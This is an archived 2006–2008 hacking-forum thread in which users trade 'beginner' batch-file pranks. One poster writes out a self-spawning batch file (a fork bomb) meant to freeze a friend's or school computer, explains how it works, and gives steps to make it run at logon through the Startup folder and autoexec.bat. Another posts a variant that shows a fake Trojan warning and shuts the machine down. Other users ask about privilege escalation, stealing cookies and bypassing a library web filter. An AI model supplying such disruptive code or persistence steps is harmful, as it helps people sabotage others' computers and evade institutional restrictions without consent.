PDA

View Full Version : Beginner Shit


Ranciday4182
May 10th, 2006, 09:59 PM
What are some beginner (easy to execute, no/little programs needed)

Cuddles
May 10th, 2006, 10:25 PM
write a batch program and convince a friend to run it....make it continually write something on the screen......or make a string of batch files that each open eachother, and then slowly form a sentence, and repeat till all resources are used up, and the comp freezes.....i think ill do that now.....it will be fun....unfortunately, i would have to run it on my computer, and i dont want to have to restart, so i wont make it till i am going somewhere where it will be useful, and then it will be on a floppy, which i will run at their house.....ooh...i think i will make this.....this weekend...i dont feel like it now++i dont have a floppy drive....

H4X0R 31337
May 15th, 2006, 04:04 PM
cuddles do u think u can show us how to write some of these batch files you r talking about?

Cuddles
May 15th, 2006, 08:10 PM
no...im lazy....or i just dont feel like it....google them...theyr not even difficult...you just write the program in notepad, and save it as a .bat file.....i dont usually write them, so i dont have the commands committed to memory, but i believe an easy one would be (in notepad)

@echo off
cls
:enter
start whatever.bat
goto enter

then save this as whatever.bat (no spaces between whatever and .bat), making sure its set to save as type "all files", so it doesnt tag a .txt to the end.....this program will continually open its self, and force the person to restart their computer....and i believe there is a way to cause it to load every time they start their computer, and there are ways to avoid it showing the .bat ending.... (you can call it anything that you want, just make sure you change the whatever.bat to whatever you call it)


happy? now trust google, its your friend...or hackthissite.org, they have some good tutorials on it...under the articles section....

Acrylic76
May 15th, 2006, 08:45 PM
Right click the Start button and choose open then go up two levels to select a user. Selct programs then startup. Anything you put there will activate as soon as they log on.

Cuddles
May 15th, 2006, 08:55 PM
theres also a way to get it to open by adding it to the autoexec.bat, but i dont know which one, or the command to add to get it to work....

dunce
May 16th, 2006, 09:19 PM
cool, now, explain sumthin else, like using ip's to get into an assholes cookies pls

Cuddles
May 16th, 2006, 09:56 PM
y? dont you know how to use google?

Arsonist123
May 17th, 2006, 09:33 PM
i tried that batch filr and it worked but does it work on school computers without command prompt?

Cuddles
May 17th, 2006, 10:28 PM
i really doubt the school doesnt have cmd prompt...... its prolly just been disabled......but it may work, i havent tried.....

also, i just remembered that there is a way to elevate your user privilages using a .bat file...ill have to look that up.....it could come in handy....

Acrylic76
May 17th, 2006, 10:37 PM
You can use batch files even if your command prompt is disabled.

jolly2roger
May 17th, 2006, 11:03 PM
i just remembered that there is a way to elevate your user privilages using a .bat file

Id like to know more about that, it could definatly come in handy

Arsonist123
May 18th, 2006, 04:47 PM
my school blocks all command prompt files so it wouldnt run it it braught up a message saying that it didnt work due to restrictions in effect on that computer.

Arsonist123
May 18th, 2006, 04:48 PM
and is there a command that you can put in batch files that makes it so that it runs that file whenever they start the computer?

Cuddles
May 18th, 2006, 05:49 PM
add the line "CALL whatever.bat" (w/o the quotes) to autoexec.bat (should be in c:/ or whatever your drive name is.....)

still workin on that other batch file...im tryin to get a means to elevate your privilages that i can write into batch......

Arsonist123
May 18th, 2006, 07:43 PM
my drive is c:\ but i couldnt find autoexec.bat in there

Acrylic76
May 18th, 2006, 08:13 PM
That's cuz it's in a different drive.

Cuddles
May 18th, 2006, 08:15 PM
go to tools, folder options, then whatever tab has all the check boxes (im not on windows, so i cant check which one it is...) and find where it says do not show hidden files, and check the button that says show them, then un-check the button that says hide system files, and the other one that says hide known extensions....that should show it.....if it doesnt, i donno whats going on.....

dunce
May 18th, 2006, 08:36 PM
about that school .bat thing my school dosent have it but i did check on the dos program in the start menue on programs and its prety much the same thing as command prompt at my shcool anyway tell me if i'm wrong

Cuddles
May 18th, 2006, 08:41 PM
i cant tell you if you're wrong...i cant understand most of what you said.....please speak more coherently....

jolly2roger
May 18th, 2006, 09:48 PM
okayz i aint comming around much but all you bitches arguing about how to use netsend made me realize i hate you all and should make you a prog... so i made a network messenger for you guys ....


dude...learn how to fucking type

Yodalover
May 18th, 2006, 10:19 PM
What is so bad about the way he typed? I'm not saying it's good, but it's better than a lot of people. He added an unnecessary z, didn't use punctuation, and that's about it.

jolly2roger
May 18th, 2006, 11:23 PM
its really annoying reading all the chat slang, and yes your right, its better than most people, but i give them all shit for it too

Yodalover
May 19th, 2006, 12:36 AM
It's not even slang unless you count "okayz" and "aint" as slang.

Cuddles
May 19th, 2006, 03:16 PM
ain't is in the dictionary.....

jolly2roger
May 19th, 2006, 05:48 PM
as my mother always said..."aint" aint a word

Hitler Jr
May 19th, 2006, 11:26 PM
aint is so a word i use it everyday. and so is fixin too it means that your about too duh!

dunce
May 20th, 2006, 12:18 AM
when the hell did this turn into a grammer thread? :?: :?

jolly2roger
May 20th, 2006, 12:59 AM
lmfao i dont know

dunce
May 20th, 2006, 03:20 PM
i cant tell you if you're wrong...i cant understand most of what you said.....please speak more coherently....

have you ever heard of "dos"? well its prety much the old version of cmd promt that micros soft used, maybe it'll work with dos

p.s. i tried the thing and it worked

Acrylic76
May 20th, 2006, 03:35 PM
MS-DOS Microsoft Disk Operating System
DOS Denial of Service Attack

xXAnonymousXx
September 16th, 2006, 02:10 AM
[quote="Cuddles"]@echo off
cls
:enter
start whatever.bat
goto enter[\quote]

I googled, but i didnt find anything on making it repeat until the victim is forced to shut down there computer, but i did use this and it worked but wat is it that makes it repeat? :?

Cuddles
September 18th, 2006, 03:42 PM
here's a breakdown on how it works:

@echo off <--tells the computer not to display the commands as they are run
:enter <--sets a point called enter so that you can go back to it
start whatever.bat <--starts whatever.bat (its what is already running)
goto enter <--repeats the process

the basic concept is that it starts it's self, but when it starts it's self, it opens it's self again, causing a massive chain which makes millions of it open (bit more difficult on some xp machines, with buffer overflow protection things and the like.....)

pyromaniac06
September 22nd, 2006, 09:23 PM
i know i havent been around much, but here is a cool little batch file that is excellent for fucking with someone and for beginnes:

@echo off
:
cls
start whatever.bat
shutdown /s /c "your computer is infected with a Trojan viurs, shutting down to do windows restore, and restarting in safe mode"

ishkur88
December 18th, 2006, 05:43 PM
There are a fucking infinite number of variations of the same code that do that, and they are all annoying and unnecessary. People need to stop learning batch files like this, it just instills a bad seed in their head and they will never do anything more than the same shit as there is below

@echo off
cls
:enter
start whatever.bat
goto enter

sure its a good first or second one, but thats about it. Try learning to use it for useful stuff; like automating ipconfig or some shit.

just please stop with the same, repeating and single track "shutdown" batches. K

lvmonkey24
December 8th, 2008, 01:43 PM
Does anyone know how to bypass a computer block. I am using a library computer and there is this Dansgardian block that keeps blocking web sites that I want to check out. I need to know how to bypass this. It even keeps blocking sertian parts of this site.
PLEASE HELP!!!!

lvmonkey24
December 8th, 2008, 01:45 PM
Does anyone know how to bypass a computer block. I am using a library computer and there is this damn Dansgardian block that keeps blocking web sites that I want to check out. I need to know how to bypass this. It even keeps blocking sertian parts of this site.
PLEASE HELP!!!!

lvmonkey24
December 8th, 2008, 02:26 PM
Does anyone know how to bypass a computer block. I am using a library computer and there is this Dansgardian block that keeps blocking web sites that I want to check out. I need to know how to bypass this. It even keeps blocking sertian parts of this site.
PLEASE HELP!!!!